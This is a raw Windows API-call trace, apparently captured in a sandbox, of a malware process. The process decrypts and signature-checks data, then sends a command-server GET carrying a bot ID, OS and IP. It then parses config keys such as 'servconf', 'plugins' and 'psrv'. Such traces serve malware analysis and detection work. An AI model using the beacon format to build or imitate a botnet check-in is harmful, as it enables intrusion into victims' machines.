	[0208.632] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b2050, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b2050, pdwDataLen=0x129364) returned 1
	[0208.632] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.632] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.632] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.632] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.632] CryptHashData (hHash=0x22b6ac0, pbData=0x275fc38, dwDataLen=0xd20, dwFlags=0x0) returned 1
	[0208.632] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.632] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b2078
	[0208.632] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26b2078, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b2078, pdwDataLen=0x129364) returned 1
	[0208.632] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0208.632] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.632] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.633] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.633] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0xd40, dwFlags=0x0) returned 1
	[0208.633] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.633] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b20a0
	[0208.633] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b20a0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b20a0, pdwDataLen=0x129364) returned 1
	[0208.633] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.633] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.633] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.633] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.633] CryptHashData (hHash=0x22b6ac0, pbData=0x275fc38, dwDataLen=0xd60, dwFlags=0x0) returned 1
	[0208.633] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.633] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b20c8
	[0208.633] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26b20c8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b20c8, pdwDataLen=0x129364) returned 1
	[0208.633] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0208.634] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.634] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.634] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.634] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0xd80, dwFlags=0x0) returned 1
	[0208.634] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.634] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b20f0
	[0208.634] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b20f0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b20f0, pdwDataLen=0x129364) returned 1
	[0208.634] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.634] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.634] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.634] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.634] CryptHashData (hHash=0x22b6ac0, pbData=0x275fc38, dwDataLen=0xda0, dwFlags=0x0) returned 1
	[0208.634] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.634] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b2118
	[0208.634] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26b2118, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b2118, pdwDataLen=0x129364) returned 1
	[0208.635] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0208.635] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.635] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.635] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.635] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0xdc0, dwFlags=0x0) returned 1
	[0208.635] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.635] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b2140
	[0208.635] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b2140, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b2140, pdwDataLen=0x129364) returned 1
	[0208.635] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.635] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.635] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.636] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.636] CryptHashData (hHash=0x22b6ac0, pbData=0x275fc38, dwDataLen=0xde0, dwFlags=0x0) returned 1
	[0208.636] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.636] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b2168
	[0208.636] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26b2168, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b2168, pdwDataLen=0x129364) returned 1
	[0208.636] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0208.636] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.636] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.636] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.636] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0xe00, dwFlags=0x0) returned 1
	[0208.636] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.636] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b2190
	[0208.636] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b2190, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b2190, pdwDataLen=0x129364) returned 1
	[0208.636] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.636] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.636] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.637] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.637] CryptHashData (hHash=0x22b6ac0, pbData=0x275fc38, dwDataLen=0xe20, dwFlags=0x0) returned 1
	[0208.637] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.637] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b21b8
	[0208.637] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26b21b8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b21b8, pdwDataLen=0x129364) returned 1
	[0208.637] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0208.637] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.637] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.637] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.637] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0xe40, dwFlags=0x0) returned 1
	[0208.637] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.637] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b21e0
	[0208.637] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b21e0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b21e0, pdwDataLen=0x129364) returned 1
	[0208.637] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.637] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.637] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.638] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.638] CryptHashData (hHash=0x22b6ac0, pbData=0x275fc38, dwDataLen=0xe60, dwFlags=0x0) returned 1
	[0208.638] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.638] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b2208
	[0208.638] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26b2208, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b2208, pdwDataLen=0x129364) returned 1
	[0208.638] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0208.638] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.638] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.638] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.638] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0xe80, dwFlags=0x0) returned 1
	[0208.638] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.638] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b2230
	[0208.638] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b2230, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b2230, pdwDataLen=0x129364) returned 1
	[0208.638] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.639] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.639] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.639] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.639] CryptHashData (hHash=0x22b6ac0, pbData=0x275fc38, dwDataLen=0xea0, dwFlags=0x0) returned 1
	[0208.639] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.639] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b2258
	[0208.639] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26b2258, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b2258, pdwDataLen=0x129364) returned 1
	[0208.639] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0208.639] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.639] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.639] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.639] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0xec0, dwFlags=0x0) returned 1
	[0208.639] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.640] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b2280, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b2280, pdwDataLen=0x129364) returned 1
	[0208.640] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.640] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.640] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.640] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.640] CryptHashData (hHash=0x22b6ac0, pbData=0x275fc38, dwDataLen=0xee0, dwFlags=0x0) returned 1
	[0208.640] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.640] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26b22a8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b22a8, pdwDataLen=0x129364) returned 1
	[0208.640] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0208.640] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.640] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.640] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.640] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0xf00, dwFlags=0x0) returned 1
	[0208.641] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.641] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b22d0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b22d0, pdwDataLen=0x129364) returned 1
	[0208.641] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.641] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.641] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.641] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.641] CryptHashData (hHash=0x22b6ac0, pbData=0x275fc38, dwDataLen=0xf20, dwFlags=0x0) returned 1
	[0208.641] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.641] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26b22f8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b22f8, pdwDataLen=0x129364) returned 1
	[0208.641] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0208.641] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.642] CryptImportKey (in: hProv=0x2255b0, pbData=0x129358, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x129398 | out: phKey=0x129398*=0x22b6ac0) returned 1
	[0208.642] CryptSetKeyParam (hKey=0x22b6ac0, dwParam=0x4, pbData=0x129384*=0x1, dwFlags=0x0) returned 1
	[0208.642] CryptSetKeyParam (hKey=0x22b6ac0, dwParam=0x1, pbData=0x26b2410, dwFlags=0x0) returned 1
	[0208.642] CryptDecrypt (in: hKey=0x22b6ac0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x227ba50, pdwDataLen=0x12938c | out: pbData=0x227ba50, pdwDataLen=0x12938c) returned 1
	[0208.643] CryptDestroyKey (hKey=0x22b6ac0) returned 1
	[0208.643] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.643] GetVersion () returned 0x1db10106
	[0208.643] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x129398, pszAlgId="ECDSA_P384", pszImplementation=0x0, dwFlags=0x0 | out: phAlgorithm=0x129398) returned 0x0
	[0208.643] BCryptImportKeyPair (in: hAlgorithm=0x22ee3e8, hImportKey=0x0, pszBlobType="ECCPUBLICBLOB", phKey=0x1293a0, pbInput=0x211118, cbInput=0x68, dwFlags=0x0 | out: phKey=0x1293a0) returned 0x0
	[0208.646] BCryptGetProperty (in: hObject=0x2299ad0, pszProperty="SignatureLength", pbOutput=0x1293b8, cbOutput=0x4, pcbResult=0x129390, dwFlags=0x0 | out: pbOutput=0x1293b8, pcbResult=0x129390) returned 0x0
	[0208.646] BCryptVerifySignature (hKey=0x2299ad0, pPaddingInfo=0x0, pbHash=0x22a6260, cbHash=0x30, pbSignature=0x227ba84, cbSignature=0x60, dwFlags=0x0) returned 0x0
	[0208.648] BCryptDestroyKey (in: hKey=0x2299ad0 | out: hKey=0x2299ad0) returned 0x0
	[0208.648] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x22ee3e8, dwFlags=0x0 | out: hAlgorithm=0x22ee3e8) returned 0x0
	[0208.648] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6260) returned 1
	[0208.648] CharLowerBuffA (in: lpsz="ssert", cchLength=0x5 | out: lpsz="ssert") returned 0x5
	[0208.648] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffb88) returned 1
	[0208.648] CharLowerBuffA (in: lpsz="expir", cchLength=0x5 | out: lpsz="expir") returned 0x5
	[0208.648] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffb88) returned 1
	[0208.648] WinHttpCloseHandle (hInternet=0x24a3b8) returned 1
	[0208.648] WinHttpSetTimeouts (hInternet=0x1f2598, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0208.648] WinHttpOpenRequest (hConnect=0x22c4dc0, pwszVerb="GET", pwszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/0/Windows 7 x86 SP1/1058/84.182.248.91/E8BC99265198FF1B122E2AA85B368523CB02BE18D865E27FA7C76B40094A3089/hzMfzLbwHatCXrDUl3Pl3Ney/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x24a3b8
	[0208.648] WinHttpSetOption (hInternet=0x24a3b8, dwOption=0x1f, lpBuffer=0x128bc0, dwBufferLength=0x4) returned 1
	[0208.648] WinHttpSendRequest (hRequest=0x24a3b8, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0209.095] WinHttpReceiveResponse (hRequest=0x24a3b8, lpReserved=0x0) returned 1
	[0209.095] WinHttpQueryHeaders (in: hRequest=0x24a3b8, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x128bb0, lpdwBufferLength=0x128bac, lpdwIndex=0x0 | out: lpBuffer=0x128bb0*, lpdwBufferLength=0x128bac*=0x4, lpdwIndex=0x0) returned 1
	[0209.095] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x128bb4 | out: lpdwNumberOfBytesAvailable=0x128bb4*=0x387) returned 1
	[0209.095] WinHttpReadData (in: hRequest=0x24a3b8, lpBuffer=0x22d6650, dwNumberOfBytesToRead=0x387, lpdwNumberOfBytesRead=0x128bac | out: lpBuffer=0x22d6650*, lpdwNumberOfBytesRead=0x128bac*=0x387) returned 1
	[0209.095] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x128bb4 | out: lpdwNumberOfBytesAvailable=0x128bb4*=0x0) returned 1
	[0209.125] CryptImportKey (in: hProv=0x2255b0, pbData=0x129420, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x129460 | out: phKey=0x129460*=0x22b6ac0) returned 1
	[0209.125] CryptSetKeyParam (hKey=0x22b6ac0, dwParam=0x4, pbData=0x12944c*=0x1, dwFlags=0x0) returned 1
	[0209.125] CryptSetKeyParam (hKey=0x22b6ac0, dwParam=0x1, pbData=0x2732b98, dwFlags=0x0) returned 1
	[0209.125] CryptDecrypt (in: hKey=0x22b6ac0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x22d6d10, pdwDataLen=0x129454 | out: pbData=0x22d6d10, pdwDataLen=0x129454) returned 1
	[0209.125] CryptDestroyKey (hKey=0x22b6ac0) returned 1
	[0209.125] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0209.125] GetVersion () returned 0x1db10106
	[0209.125] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x129460, pszAlgId="ECDSA_P384", pszImplementation=0x0, dwFlags=0x0 | out: phAlgorithm=0x129460) returned 0x0
	[0209.126] BCryptImportKeyPair (in: hAlgorithm=0x22ee3e8, hImportKey=0x0, pszBlobType="ECCPUBLICBLOB", phKey=0x129468, pbInput=0x211118, cbInput=0x68, dwFlags=0x0 | out: phKey=0x129468) returned 0x0
	[0209.128] BCryptGetProperty (in: hObject=0x2299ad0, pszProperty="SignatureLength", pbOutput=0x129480, cbOutput=0x4, pcbResult=0x129458, dwFlags=0x0 | out: pbOutput=0x129480, pcbResult=0x129458) returned 0x0
	[0209.128] BCryptVerifySignature (hKey=0x2299ad0, pPaddingInfo=0x0, pbHash=0x22a6260, cbHash=0x30, pbSignature=0x22d6f8e, cbSignature=0x60, dwFlags=0x0) returned 0x0
	[0209.130] BCryptDestroyKey (in: hKey=0x2299ad0 | out: hKey=0x2299ad0) returned 0x0
	[0209.130] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x22ee3e8, dwFlags=0x0 | out: hAlgorithm=0x22ee3e8) returned 0x0
	[0209.130] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6260) returned 1
	[0209.130] CharLowerBuffA (in: lpsz="servconf", cchLength=0x8 | out: lpsz="servconf") returned 0x8
	[0209.130] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0a8) returned 1
	[0209.130] CharLowerBuffA (in: lpsz="expir", cchLength=0x5 | out: lpsz="expir") returned 0x5
	[0209.130] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0a8) returned 1
	[0209.130] CharLowerBuffA (in: lpsz="plugins", cchLength=0x7 | out: lpsz="plugins") returned 0x7
	[0209.130] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad1b0) returned 1
	[0209.130] CharLowerBuffA (in: lpsz="psrv", cchLength=0x4 | out: lpsz="psrv") returned 0x4
	[0209.130] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad1b0) returned 1
	[0209.130] CharLowerBuffA (in: lpsz="psrv", cchLength=0x4 | out: lpsz="psrv") returned 0x4
	[0209.130] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad1b0) returned 1
	[0209.130] CharLowerBuffA (in: lpsz="psrv", cchLength=0x4 | out: lpsz="psrv") returned 0x4
	[0209.130] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad1b0) returned 1
	[0209.131] CharLowerBuffA (in: lpsz="psrv", cchLength=0x4 | out: lpsz="psrv") returned 0x4
	[0209.131] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad1b0) returned 1
	[0209.131] CharLowerBuffA (in: lpsz="psrv", cchLength=0x4 | out: lpsz="psrv") returned 0x4
	[0209.131] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad1b0) returned 1
	[0209.131] CharLowerBuffA (in: lpsz="psrv", cchLength=0x4 | out: lpsz="psrv") returned 0x4
	[0209.131] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad1b0) returned 1
	[0209.131] CharLowerBuffA (in: lpsz="psrv", cchLength=0x4 | out: lpsz="psrv") returned 0x4
	[0209.131] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad1b0) returned 1
	[0209.131] CharLowerBuffA (in: lpsz="psrv", cchLength=0x4 | out: lpsz="psrv") returned 0x4
	[0209.131] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad1b0) returned 1
	[0209.131] CharLowerBuffA (in: lpsz="psrv", cchLength=0x4 | out: lpsz="psrv") returned 0x4
	[0209.131] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad1b0) returned 1
	[0209.131] CharLowerBuffA (in: lpsz="psrv", cchLength=0x4 | out: lpsz="psrv") returned 0x4
	[0209.131] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad1b0) returned 1
	[0209.131] CharLowerBuffA (in: lpsz="psrv", cchLength=0x4 | out: lpsz="psrv") returned 0x4
